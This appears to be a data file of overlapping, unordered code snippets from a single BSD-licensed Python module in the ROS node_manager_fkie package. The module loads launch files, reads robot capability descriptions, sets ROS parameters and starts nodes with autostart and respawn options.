"[respawn[0], prefix, cmd[0]] cmd_args = [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] = node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):] = args",
"if code != 1: raise StartException(\"Failed to set parameter: %s\" % (msg)) except",
"'') rospy.loginfo(\"package: %s\" % self.package) self.do_autostart = rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart: %s\" % self.do_autostart)",
"the above copyright # notice, this list of conditions and the following disclaimer.",
"BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF",
"depending on ROS distribution API. @return: ROS HOME path @rtype: C{str} ''' try:",
"def load(self, delay_service_creation=0.): ''' Load the launch file configuration ''' with self.__lock: self._pending_starts.clear()",
"self.rosservice_reload) rospy.Service('~description', ListDescription, self.rosservice_description) self.runService = None '''@ivar: The service will be created",
"ns cap.name = group cap.type = descr_dict['type'] cap.images = list(descr_dict['images']) cap.description = descr_dict['description']",
"handle different result types str or array of string if sys.version_info[0] <= 2:",
"the above # copyright notice, this list of conditions and the following #",
"1: # raise StartException(\"Failed to clear parameter: %s\"%(msg)) # multi-call objects are not",
"machine.env_args: # env[len(env):] = machine.env_args # nm.screen().testScreen() cmd = self._get_node(n.package, n.type) # determine",
"roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) # get the robot description self.description_response =",
"''' Searches for a launch file. If package is given, try first to",
"import os import rosgraph.masterapi import rosgraph.names import roslib.names import roslib.network import rospy import",
"EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. from __future__ import",
"nm.screen().testScreen() cmd = self._get_node(n.package, n.type) # determine the current working path, Default: the",
"return ListNodesResponse(self.nodes) def rosservice_start_node(self, req): ''' Callback for the ROS service to start",
"# self.runService = rospy.Service('~run', Task, self.rosservice_start_node) # self.listServic = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) #",
"self.file = '' self.__lock = threading.RLock() # Load parameter self.launch_file = rospy.get_param('~launch_file', '')",
"%s in package [%s] not found!' % (path, package)) def rosservice_list_nodes(self, req): '''",
"is set, try to find the launch file in the given package if",
"permitted provided that the following conditions # are met: # # * Redistributions",
"node environment parameter for k, v in n.env_args: new_env[k] = v # the",
"= self._get_start_required(node) if autostart and start_required: start_now = False # get published topics",
"except: pass return result def get_ros_home(self): ''' Returns the ROS HOME path depending",
"to inform the caller about a new configuration. ''' self.listService = None '''@ivar:",
"it causes too much spam # printlog(\"setting parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key, p.value) r",
"first to find the launch file in the given package. If more then",
"node_cmd = [respawn[0], prefix, cmd[0]] cmd_args = [ScreenHandler.getSceenCmd(node)] cmd_args[len(cmd_args):] = node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):]",
"e: # multiple nodes, invalid package raise StartException(str(e)) except Exception as e: raise",
"result types str or array of string if sys.version_info[0] <= 2: import types",
"IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF",
"print(entry[0], rospy.get_param('/mastername', '')) if not entry[0] or entry[0] == rospy.get_param('/mastername', ''): dr.robot_name =",
"result = result.decode(sys.getfilesystemencoding()) except: pass return result def getCapabilitiesDesrc(self): ''' Parses the launch",
"in result[machine_name][ns]: try: result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'], 'nodes': []}",
"StartException('Multiple executables are found! The first one was started! Exceutables:\\n%s' % str(cmd)) def",
"loader.load(launch_path, self.roscfg, verbose=False, argv=argv) # create the list with node names for item",
"master URI depending on ROS distribution API. @return: ROS master URI @rtype: C{str}",
"and not item.machine_name == 'localhost' else '' added = False cap_param = roslib.names.ns_join(node_fullname,",
"param.endswith('capabilities'): if isinstance(p.value, list): if len(p.value) > 0 and len(p.value[0]) != 4: print(\"WRONG",
"the caller about a new configuration. if self.runService is not None: self.runService.shutdown('reload config')",
"Returns the current description. ''' return self.description_response def loadParams(self): ''' Loads all parameter",
"e: raise StartException(str(e)) # handle different result types str or array of string",
"given launch file. ''' pass class StartException(Exception): ''' The exception throwing while run",
"return roslib.rosenv.get_master_uri() else: return rosgraph.rosenv.get_master_uri() except: return roslib.rosenv.get_master_uri() def _timed_service_creation(self): with self.__lock: try:",
"import ListDescription, ListNodes, Task, ListDescriptionResponse, ListNodesResponse # , LoadLaunch from rosgraph.rosenv import ROS_NAMESPACE",
"into the ROS parameter server if self.load_params_at_start: self.loadParams() # initialize the ROS services",
"as it causes too much spam # printlog(\"setting parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key, p.value)",
"try: result['delay'] = int(self.roscfg.params[respawn_delay].value) except: pass return result def get_ros_home(self): ''' Returns the",
"'images', 'description'] -> ignore\", param) else: for entry in p.value: capabilies_descr[entry[0]] = {'type':",
"autostarts try: self._pending_starts.remove(node) except: pass # print the current pending autostarts if self._pending_starts_last_printed",
"env[len(env):] = machine.env_args # nm.screen().testScreen() cmd = self._get_node(n.package, n.type) # determine the current",
"'', '') '''@ivar: robot description as tupel of (type, name, text) ''' self.package",
"[] # the name of nodes with namespace self.sensors = {} # sensor",
"following conditions # are met: # # * Redistributions of source code must",
"self.package) rospy.loginfo(\"loading launch file: %s\", launch_path) self.masteruri = self._masteruri_from_ros() self.roscfg = ROSLaunchConfig() loader",
"with names of nodes with name spaces.''' self.sensors = {} '''@ivar: Sensor description:",
"rosgraph.masterapi.Master(self.masteruri) for topic, datatype in master.getPublishedTopics(''): if start_required == topic: start_now = True",
"# return [] def rosservice_description(self, req): ''' Returns the current description. ''' return",
"rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try: return bool(self.roscfg.params[param_name].value) except: pass return False def _get_start_delay(self, node): param_name",
"to find the launch file in the given package if package: paths =",
"Exception as e: rospy.logwarn(\"Error while start %s: %s\", n, e) self.do_autostart = False",
"= roslib.names.ns_join(cap_ns, 'capability_group') if cap_ns == node_fullname: cap_ns = item.namespace.rstrip(roslib.names.SEP) # if the",
"req): ''' Callback for the ROS service to get the list with available",
"p.value: try: print(entry[0], rospy.get_param('/mastername', '')) if not entry[0] or entry[0] == rospy.get_param('/mastername', ''):",
"% n.cwd) # add remaps for remap in n.remap_args: args.append('%s:=%s' % (remap[0], remap[1]))",
"on ROS distribution API. @return: ROS master URI @rtype: C{str} ''' try: import",
"self.parameter_loaded = True def runNode(self, node, autostart=False): ''' Start the node with given",
"of conditions and the following disclaimer. # * Redistributions in binary form must",
"IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY",
"n = item break if n is None: raise StartException(\"Node '%s' not found!\"",
"code != 1: raise StartException(\"Failed to set parameter: %s\" % (msg)) except Exception:",
"ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING",
"if cmd is None or len(cmd) == 0: raise StartException('%s in package [%s]",
"of the launch file @rtype: C{str} @raise LoadException: if the given file is",
"the robot description self.description_response = dr = ListDescriptionResponse() dr.robot_name = '' dr.robot_type =",
"ListDescriptionResponse() dr.robot_name = '' dr.robot_type = '' dr.robot_descr = '' for param, p",
"# set delayed autostart parameter self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace, n.name), autostart) if len(cmd)",
"('', '', '') '''@ivar: robot description as tupel of (type, name, text) '''",
"if not cap_ns: cap_ns = roslib.names.SEP cap_param = roslib.names.ns_join(cap_ns, 'capability_group') if cap_ns ==",
"dr.robot_name = self._decode(entry[2]) dr.robot_type = entry[1] dr.robot_images = entry[3].split(',') dr.robot_descr = self._decode(entry[4]) break",
"POSSIBILITY OF SUCH DAMAGE. from __future__ import print_function from multimaster_msgs_fkie.msg import Capability from",
"# Copyright (c) 2012, Fraunhofer FKIE/US, <NAME> # All rights reserved. # #",
"raise StartException(\"Node '%s' not found!\" % node) if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): #",
"for item in self.roscfg.nodes: node_fullname = roslib.names.ns_join(item.namespace, item.name) machine_name = item.machine_name if item.machine_name",
"of string if sys.version_info[0] <= 2: import types string_types = types.StringTypes else: string_types",
"this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED",
"INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED",
"import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: return roslib.rosenv.get_master_uri()",
"except Exception as e: raise StartException(str(e)) # handle different result types str or",
"msg, _ in r: # if code != 1: # raise StartException(\"Failed to",
"unicode. @param val: the string coding as system default @type val: str @return:",
"= self._filter_args(sys.argv) # remove namespace from sys.argv to avoid load the launchfile info",
"to empty namespace os.environ[ROS_NAMESPACE] = rospy.names.SEP rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path, self.roscfg, verbose=False, argv=argv) #",
"dr.robot_descr = '' for param, p in self.roscfg.params.items(): if param.endswith('robots'): if isinstance(p.value, list):",
"# the ROS_NAMESPACE environment is used in cpp plugins in rqt if n.namespace:",
"parameter server if self.load_params_at_start: self.loadParams() # initialize the ROS services # HACK to",
"'default_cfg/autostart/delay') try: return float(self.roscfg.params[param_name].value) except: pass return 0. def _get_start_required(self, node): param_name =",
"\", \"\\n\") try: result = result.decode(sys.getfilesystemencoding()) except: pass return result def getCapabilitiesDesrc(self): '''",
"= self._masteruri_from_ros() self.roscfg = ROSLaunchConfig() loader = XmlLoader() argv = self._filter_args(sys.argv) # remove",
"autostart rospy.loginfo(\"%s is in exclude list, skip autostart\", n.name) return # env =",
"int(self.roscfg.params[respawn_max].value) except: pass try: result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value) except: pass try: result['delay'] = int(self.roscfg.params[respawn_delay].value)",
"def loadParams(self): ''' Loads all parameter into ROS parameter server. ''' params =",
"node, autostart)) start_timer.start() if start_now and autostart and start_delay > 0: start_now =",
"array of string if sys.version_info[0] <= 2: import types string_types = types.StringTypes else:",
"parameter server \"\"\" try: import xmlrpclib except ImportError: import xmlrpc.client as xmlrpclib param_server",
"0 and len(p.value[0]) != 5: print(\"WRONG format, expected: ['host(ROS master Name)', 'type', 'name',",
"ns, group_dict in ns_dict.items(): for group, descr_dict in group_dict.items(): if descr_dict['nodes']: cap =",
"create the description list first for param, p in self.roscfg.params.items(): if param.endswith('capabilities'): if",
"for f in afilter: if a.startswith(f): in_filter = True break if ':=' not",
"# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #",
"configuration ''' with self.__lock: self._pending_starts.clear() # shutdown the services to inform the caller",
"node if ns not in result[machine_name]: result[machine_name][ns] = dict() if p.value not in",
"n.type) # determine the current working path, Default: the package of the node",
"shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run node '%s as': %s\", node, str(' '.join(popen_cmd))) # remove the",
"to let the node_manager to update the view if delay_service_creation > 0.: t",
"are permitted provided that the following conditions # are met: # # *",
"namespace os.environ[ROS_NAMESPACE] = rospy.names.SEP rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path, self.roscfg, verbose=False, argv=argv) # create the",
"= self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) # get the robot",
"distro = rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: import roslib.rosenv return roslib.rosenv.get_ros_home()",
"with the distribution. # * Neither the name of Fraunhofer nor the names",
"Fraunhofer nor the names of its # contributors may be used to endorse",
"finally: # self.__lock.release() # return [] def rosservice_description(self, req): ''' Returns the current",
"raise LoadException('File %s in package [%s] not found!' % (path, package)) def rosservice_list_nodes(self,",
"ignore\", param) else: for entry in p.value: capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]), 'images': entry[2].split(','),",
"args = ['__ns:=%s' % n.namespace, '__name:=%s' % n.name] if not (n.cwd is None):",
"self.runService.shutdown('reload config') self.runService = None if self.listService is not None: self.listService.shutdown('reload config') self.listService",
"# sensor descriptions launch_path = self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading launch file: %s\", launch_path) self.masteruri",
"and len(p.value[0]) != 5: print(\"WRONG format, expected: ['host(ROS master Name)', 'type', 'name', 'images',",
"import rosgraph.names import roslib.names import roslib.network import rospy import shlex import std_srvs.srv import",
"list of conditions and the following disclaimer. # * Redistributions in binary form",
"class DefaultCfg(object): def __init__(self): self.nodes = [] '''@ivar: the list with names of",
"package is set, try to find the launch file in the given package",
"roslib.names import roslib.network import rospy import shlex import std_srvs.srv import subprocess import sys",
"timer for waiting for the topic start_timer = threading.Timer(3., self._run_node, args=(cmd, cwd, env,",
"Callback for the ROS service to start a node. ''' self.runNode(req.node) return []",
"# self.listServic = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) # except: # import traceback # print",
"n = None for item in self.roscfg.nodes: itemname = rospy.names.ns_join(item.namespace, item.name) if itemname",
"pass # get the sensor description tmp_cap_dict = self.getCapabilitiesDesrc() for machine, ns_dict in",
"> 0.: t = threading.Timer(delay_service_creation, self._timed_service_creation) t.start() else: self._timed_service_creation() # self.timer = rospy.Timer(rospy.Duration(2),",
"of nodes with namespace self.sensors = {} # sensor descriptions launch_path = self.getPath(self.launch_file,",
"except: pass # get the sensor description tmp_cap_dict = self.getCapabilitiesDesrc() for machine, ns_dict",
"not reusable param_server_multi = xmlrpclib.MultiCall(param_server) for p in params.itervalues(): # suppressing this as",
"= list(descr_dict['images']) cap.description = descr_dict['description'] cap.nodes = list(descr_dict['nodes']) dr.capabilities.append(cap) # load parameters into",
"initialize the ROS services # HACK to let the node_manager to update the",
"products derived # from this software without specific prior written permission. # #",
"return False def _get_start_delay(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay') try: return float(self.roscfg.params[param_name].value) except:",
"# , ScreenHandlerException class LoadException(Exception): ''' The exception throwing while searching for the",
"Software License Agreement (BSD License) # # Copyright (c) 2012, Fraunhofer FKIE/US, <NAME>",
"distro = rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: return roslib.rosenv.get_master_uri() else: return",
"rospy.loginfo(\"package: %s\" % self.package) self.do_autostart = rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart: %s\" % self.do_autostart) self.load_params_at_start",
"= rospy.names.ns_join(node, 'default_cfg/autostart/required/publisher') topic = '' try: topic = self.roscfg.params[param_name].value if rosgraph.names.is_private(topic): rospy.logwarn('Private",
"True start_delay = self._get_start_delay(node) start_required = self._get_start_required(node) if autostart and start_required: start_now =",
"print_function from multimaster_msgs_fkie.msg import Capability from multimaster_msgs_fkie.srv import ListDescription, ListNodes, Task, ListDescriptionResponse, ListNodesResponse",
"package of the node cwd = self.get_ros_home() if not (n.cwd is None): if",
"isinstance(self.argv, list): self.argv = [\"%s\" % self.argv] sys.argv.extend(self.argv) if self.do_autostart: rospy.set_param('~autostart', False) #",
"roslib.packages.find_resource(package, launch_file) if len(paths) > 0: # if more then one launch file",
"remap[1])) # masteruri = self.masteruri # if n.machine_name and not n.machine_name == 'localhost':",
"'_package:=', '_launch_file:='] result = [] for a in argv: in_filter = False for",
"= os.path.dirname(cmd[0]) respawn = [''] if n.respawn: respawn = self._get_node('node_manager_fkie', 'respawn') # set",
"launch_file = path # if package is set, try to find the launch",
"''' Callback for the ROS service to get the list with available nodes.",
"traceback print(traceback.format_exc()) import roslib.rosenv return roslib.rosenv.get_ros_home() @classmethod def _load_parameters(cls, masteruri, params, clear_params): \"\"\"",
"rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) except: import traceback print(traceback.format_exc()) def getPath(self, path, package=''): ''' Searches",
"try: if self.runService is None: self.runService = rospy.Service('~run', Task, self.rosservice_start_node) if self.listService is",
"''' # Load the launch file # ''' # try: # self.__lock.acquire() #",
"grouping the nodes. @return: the capabilities description stored in this configuration @rtype: C{dict(machine",
"Exceutables:\\n%s' % str(cmd)) def _run_node(self, cmd, cwd, env, node, autostart=False): self._pending_starts.add(node) start_now =",
"None for item in self.roscfg.nodes: itemname = rospy.names.ns_join(item.namespace, item.name) if itemname == node:",
"= rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart: %s\" % self.do_autostart) self.load_params_at_start = rospy.get_param('~load_params_at_start', True) self.parameter_loaded =",
"-> ignore\", param) else: for entry in p.value: try: print(entry[0], rospy.get_param('/mastername', '')) if",
"COPYRIGHT HOLDERS AND CONTRIBUTORS # \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,",
"ImportError: import xmlrpc.client as xmlrpclib param_server = xmlrpclib.ServerProxy(masteruri) p = None try: #",
"self.listService = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) except: import traceback print(traceback.format_exc()) def getPath(self, path, package=''):",
"self.do_autostart = rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart: %s\" % self.do_autostart) self.load_params_at_start = rospy.get_param('~load_params_at_start', True) self.parameter_loaded",
"'' for param, p in self.roscfg.params.items(): if param.endswith('robots'): if isinstance(p.value, list): if len(p.value)",
"% self.package) self.do_autostart = rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart: %s\" % self.do_autostart) self.load_params_at_start = rospy.get_param('~load_params_at_start',",
"item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) # get the robot description self.description_response = dr =",
"the view if delay_service_creation > 0.: t = threading.Timer(delay_service_creation, self._timed_service_creation) t.start() else: self._timed_service_creation()",
"True) # if self.nodes: # self.runService = rospy.Service('~run', Task, self.rosservice_start_node) # self.listServic =",
"self.parameter_loaded: self.loadParams() n = None for item in self.roscfg.nodes: itemname = rospy.names.ns_join(item.namespace, item.name)",
"package containing the launch file or an empty string, if the C{file} is",
"Feed) and decode the string entry from system default coding to unicode. @param",
"self._decode(entry[4]) break except: pass # get the sensor description tmp_cap_dict = self.getCapabilitiesDesrc() for",
"'nodes' : [str]))))} ''' result = dict() capabilies_descr = dict() if self.roscfg is",
"try to find the launch file in the given package if package: paths",
"TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE",
"namespace self.sensors = {} # sensor descriptions launch_path = self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading launch",
"'type', 'images', 'description'] -> ignore\", param) else: for entry in p.value: capabilies_descr[entry[0]] =",
"is ignored!' % topic) topic = '' elif not rosgraph.names.is_global(topic): topic = rospy.names.ns_join(rosgraph.names.namespace(node),",
"PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR",
"xmlrpclib.ServerProxy(masteruri) p = None try: # multi-call style xmlrpc param_server_multi = xmlrpclib.MultiCall(param_server) #",
"> 0: n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay'])) node_cmd = [respawn[0], prefix, cmd[0]] cmd_args =",
"try: result[machine_name][ns][p.value] = {'type': capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'], 'nodes': []} except: result[machine_name][ns][p.value]",
"r: if code != 1: raise StartException(\"Failed to set parameter: %s\" % (msg))",
"0: n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max'])) if respawn_params['min_runtime'] > 0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime']))",
"nodes self._pending_starts = set() self._pending_starts_last_printed = set() def _filter_args(self, argv): afilter = ['__ns:=',",
"# get published topics from ROS master master = rosgraph.masterapi.Master(self.masteruri) for topic, datatype",
"loops, to create the description list first for param, p in self.roscfg.params.items(): if",
"if isinstance(cmd, string_types): cmd = [cmd] if cmd is None or len(cmd) ==",
"tmp_cap_dict = self.getCapabilitiesDesrc() for machine, ns_dict in tmp_cap_dict.items(): if machine in self.roscfg.machines: machine",
"== rospy.get_param('/mastername', ''): dr.robot_name = self._decode(entry[2]) dr.robot_type = entry[1] dr.robot_images = entry[3].split(',') dr.robot_descr",
"rospy.get_param('/mastername', '')) if not entry[0] or entry[0] == rospy.get_param('/mastername', ''): dr.robot_name = self._decode(entry[2])",
"INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,",
"try: import xmlrpclib except ImportError: import xmlrpc.client as xmlrpclib param_server = xmlrpclib.ServerProxy(masteruri) p",
"node, autostart=False): self._pending_starts.add(node) start_now = True start_delay = self._get_start_delay(node) start_required = self._get_start_required(node) if",
"cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not cap_ns: cap_ns = roslib.names.SEP cap_param = roslib.names.ns_join(cap_ns, 'capability_group')",
"start_timer = threading.Timer(start_delay, self._run_node, args=(cmd, cwd, env, node, False)) start_timer.start() if start_now: ps",
"val): ''' Replaces the '\\\\n' by LF (Line Feed) and decode the string",
"= self._get_start_delay(node) start_required = self._get_start_required(node) if autostart and start_required: start_now = False #",
"TODO: env-loader support? # if machine.env_args: # env[len(env):] = machine.env_args # nm.screen().testScreen() cmd",
"'')) if not entry[0] or entry[0] == rospy.get_param('/mastername', ''): dr.robot_name = self._decode(entry[2]) dr.robot_type",
"robot description self.description_response = dr = ListDescriptionResponse() dr.robot_name = '' dr.robot_type = ''",
"autostarts if self._pending_starts_last_printed != self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending autostarts %d: %s\", len(self._pending_starts), self._pending_starts)",
"item in self.roscfg.nodes: if item.machine_name and not item.machine_name == 'localhost': machine = self.roscfg.machines[item.machine_name]",
"p = None try: # multi-call style xmlrpc param_server_multi = xmlrpclib.MultiCall(param_server) # clear",
"param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay') try: return float(self.roscfg.params[param_name].value) except: pass return 0. def _get_start_required(self,",
"# print 'runNode: ', cmd_args popen_cmd = shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run node '%s as':",
"in a or in_filter: continue result.append(a) return result def load(self, delay_service_creation=0.): ''' Load",
"try: result['max'] = int(self.roscfg.params[respawn_max].value) except: pass try: result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value) except: pass try:",
"in p.value: try: print(entry[0], rospy.get_param('/mastername', '')) if not entry[0] or entry[0] == rospy.get_param('/mastername',",
"if len(p.value) > 0 and len(p.value[0]) != 5: print(\"WRONG format, expected: ['host(ROS master",
"and use in source and binary forms, with or without # modification, are",
"global environment to empty namespace os.environ[ROS_NAMESPACE] = rospy.names.SEP rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path, self.roscfg, verbose=False,",
"self.roscfg.nodes: node_fullname = roslib.names.ns_join(item.namespace, item.name) machine_name = item.machine_name if item.machine_name is not None",
"the package of the node cwd = self.get_ros_home() if not (n.cwd is None):",
"self.masteruri = self._masteruri_from_ros() self.roscfg = ROSLaunchConfig() loader = XmlLoader() argv = self._filter_args(sys.argv) #",
"the file name of the launch file @type path: C{str} @param package: the",
"self.loadParams() # initialize the ROS services # HACK to let the node_manager to",
"the given file is not found ''' launch_file = path # if package",
"find the launch file in the given package if package: paths = roslib.packages.find_resource(package,",
"ROS parameter server if self.load_params_at_start: self.loadParams() # initialize the ROS services # HACK",
"['name', 'type', 'images', 'description'] -> ignore\", param) else: for entry in p.value: capabilies_descr[entry[0]]",
"threading.Timer(start_delay, self._run_node, args=(cmd, cwd, env, node, False)) start_timer.start() if start_now: ps = subprocess.Popen(cmd,",
"the node_manager to update the view if delay_service_creation > 0.: t = threading.Timer(delay_service_creation,",
"THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. from",
"skip autostart rospy.loginfo(\"%s is in exclude list, skip autostart\", n.name) return # env",
"ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN",
"the name of Fraunhofer nor the names of its # contributors may be",
"False # get published topics from ROS master master = rosgraph.masterapi.Master(self.masteruri) for topic,",
"the launch file in the given package if package: paths = roslib.packages.find_resource(package, launch_file)",
"% self.argv] sys.argv.extend(self.argv) if self.do_autostart: rospy.set_param('~autostart', False) # initialize the ROS services #",
"self.rosservice_description) self.runService = None '''@ivar: The service will be created on each load",
"return roslib.rosenv.get_master_uri() def _timed_service_creation(self): with self.__lock: try: if self.runService is None: self.runService =",
"req): # ''' # Load the launch file # ''' # try: #",
"result = {'max': 0, 'min_runtime': 0, 'delay': 0} respawn_max = rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime",
"break if ':=' not in a or in_filter: continue result.append(a) return result def",
"in group_dict.items(): if descr_dict['nodes']: cap = Capability() cap.namespace = ns cap.name = group",
"self.argv = rospy.get_param('~argv', []) rospy.loginfo(\"argv: %s\" % self.argv) if not isinstance(self.argv, list): self.argv",
"\"\"\" try: import xmlrpclib except ImportError: import xmlrpc.client as xmlrpclib param_server = xmlrpclib.ServerProxy(masteruri)",
"'description': self._decode(entry[3])} # get the capability nodes for item in self.roscfg.nodes: node_fullname =",
"ROS service to start a node. ''' self.runNode(req.node) return [] def rosservice_reload(self, req):",
"new_env[k] = v # the ROS_NAMESPACE environment is used in cpp plugins in",
"file with the same name found in the package, the first one will",
"of its # contributors may be used to endorse or promote products derived",
"rospkg.get_ros_home() except: import traceback print(traceback.format_exc()) import roslib.rosenv return roslib.rosenv.get_ros_home() @classmethod def _load_parameters(cls, masteruri,",
"cap_param = roslib.names.ns_join(cap_ns, 'capability_group') if cap_ns == node_fullname: cap_ns = item.namespace.rstrip(roslib.names.SEP) # if",
"self.roscfg.params and cap_param.count(roslib.names.SEP) > 1: cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not cap_ns: cap_ns =",
"dict(namespace: dict(group:dict('type' : str, 'description' : str, 'nodes' : [str]))))} ''' result =",
"True def runNode(self, node, autostart=False): ''' Start the node with given name from",
"%s\"%(msg)) # multi-call objects are not reusable param_server_multi = xmlrpclib.MultiCall(param_server) for p in",
"clear parameter: %s\"%(msg)) # multi-call objects are not reusable param_server_multi = xmlrpclib.MultiCall(param_server) for",
"OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER",
"'cturtle']: import roslib.rosenv return roslib.rosenv.get_ros_home() else: import rospkg return rospkg.get_ros_home() except: import traceback",
"in the package, the first one will be tacked. @param path: the file",
"roslib.rosenv.get_master_uri() else: return rosgraph.rosenv.get_master_uri() except: return roslib.rosenv.get_master_uri() def _timed_service_creation(self): with self.__lock: try: if",
"= node_fullname # find the capability group parameter in namespace while cap_param not",
"self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description', ListDescription, self.rosservice_description) self.runService = None '''@ivar: The",
"caller about a new configuration. ''' self.description_response = ListDescriptionResponse() # variables to print",
"'\\\\n' by LF (Line Feed) and decode the string entry from system default",
"in result: result[machine_name] = dict() for (ns, groups) in result[machine_name].items(): if ns ==",
"ListNodesResponse(self.nodes) def rosservice_start_node(self, req): ''' Callback for the ROS service to start a",
"package [%s] not found!' % (path, package)) def rosservice_list_nodes(self, req): ''' Callback for",
"for (ns, groups) in result[machine_name].items(): if ns == cap_ns and p.value in groups:",
"pass try: result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value) except: pass try: result['delay'] = int(self.roscfg.params[respawn_delay].value) except: pass",
"None: self.runService = rospy.Service('~run', Task, self.rosservice_start_node) if self.listService is None: self.listService = rospy.Service('~list_nodes',",
"> 1: cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not cap_ns: cap_ns = roslib.names.SEP cap_param =",
"in_filter: continue result.append(a) return result def load(self, delay_service_creation=0.): ''' Load the launch file",
"_get_start_exclude(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try: return bool(self.roscfg.params[param_name].value) except: pass return False",
"return self.description_response def loadParams(self): ''' Loads all parameter into ROS parameter server. '''",
"notice, this list of conditions and the following # disclaimer in the documentation",
"OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF",
"LoadLaunch from rosgraph.rosenv import ROS_NAMESPACE from roslaunch import ROSLaunchConfig, XmlLoader import os import",
"# create the list with node names for item in self.roscfg.nodes: if item.machine_name",
"cap.description = descr_dict['description'] cap.nodes = list(descr_dict['nodes']) dr.capabilities.append(cap) # load parameters into the ROS",
"not in result[machine_name]: result[machine_name][ns] = dict() if p.value not in result[machine_name][ns]: try: result[machine_name][ns][p.value]",
"None and not item.machine_name == 'localhost' else '' added = False cap_param =",
"try: for k in ['BASH_ENV', 'ENV']: del new_env[k] except: pass # add node",
"p in clear_params: param_server_multi.deleteParam(rospy.get_name(), p) r = param_server_multi() # for code, msg, _",
"@return: the decoded string @rtype: C{unicode} or original on error ''' result =",
"pass return result def get_ros_home(self): ''' Returns the ROS HOME path depending on",
"in the namespace of the node if ns not in result[machine_name]: result[machine_name][ns] =",
"Redistributions of source code must retain the above copyright # notice, this list",
"NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF",
"_masteruri_from_ros(self): ''' Returns the master URI depending on ROS distribution API. @return: ROS",
"launch_path) self.masteruri = self._masteruri_from_ros() self.roscfg = ROSLaunchConfig() loader = XmlLoader() argv = self._filter_args(sys.argv)",
"except: pass return False def _get_start_delay(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/delay') try: return",
"item.machine_name is not None and not item.machine_name == 'localhost' else '' added =",
"throwing while run a node containing in the loaded configuration. ''' pass class",
